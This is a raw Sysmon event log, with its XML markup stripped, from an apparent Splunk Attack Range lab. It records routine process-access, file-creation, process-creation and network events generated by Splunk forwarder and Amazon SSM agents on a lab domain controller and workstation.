10:53:01.392{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.392{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.392{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-120D-6216-2B05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.392{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-120D-6216-2B05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.394{C8EA50B7-120D-6216-2B05-000000003802}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:01.055{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF995FB9CF00AB2AF25121CFE4724E83,SHA256=39A650378B8C8F6CFD4DD0F9F4D40174A6D731F911033900276F45EB519A32D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217065Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:59.509{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51367-false10.0.1.12-8000- 23542300x8000000000000000217064Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:01.319{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-136MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:02.832{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38680B3411DC990C21B414713D30A94,SHA256=2FA211B4138290B56FC12D59D92621E7FF018703C3C4E1B276F15AA5B3491641,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.257{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-120E-6216-2C05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-120E-6216-2C05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.241{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-120E-6216-2C05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.243{C8EA50B7-120E-6216-2C05-000000003802}6576C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:02.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77CDB817F2FF4A462D3B8708FF07BC0,SHA256=8A999F0A60E2346F4B746E57D580A33276ACFA71091441906CA2D4A4CD995446,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:02.318{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-137MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:03.848{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32984A1CF9528C77E8680FD9C3609702,SHA256=CC172A65C77E30FBBCF57048F8FF92314E9B11DD8DE4118FD6DF141FBF41A003,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:00.728{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53509-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:03.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA8988848F7FD76A387EF5F0106068E,SHA256=D4599B17B778B30B906D87EA91D5BB4F6A889DF385F8E36E369CD2A3C5702871,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:04.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3F55BC8C86F8B03C463D7063165DED5,SHA256=2AE0B0CE24E0FE13B6A3D2BFD211DF31EBC2A9E2F18F6DE51523092C4517E2C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1210-6216-2D05-000000003802}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1210-6216-2D05-000000003802}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.201{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1210-6216-2D05-000000003802}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.203{C8EA50B7-1210-6216-2D05-000000003802}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:04.101{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0F90A0D4BC8DF63D0273A91E804FF93,SHA256=D98A01F6DA216DE980AEDE23FF3C1C69A68E3F62A01B394D0F447C4C0F5306F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:03.191{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53510-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:03.191{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 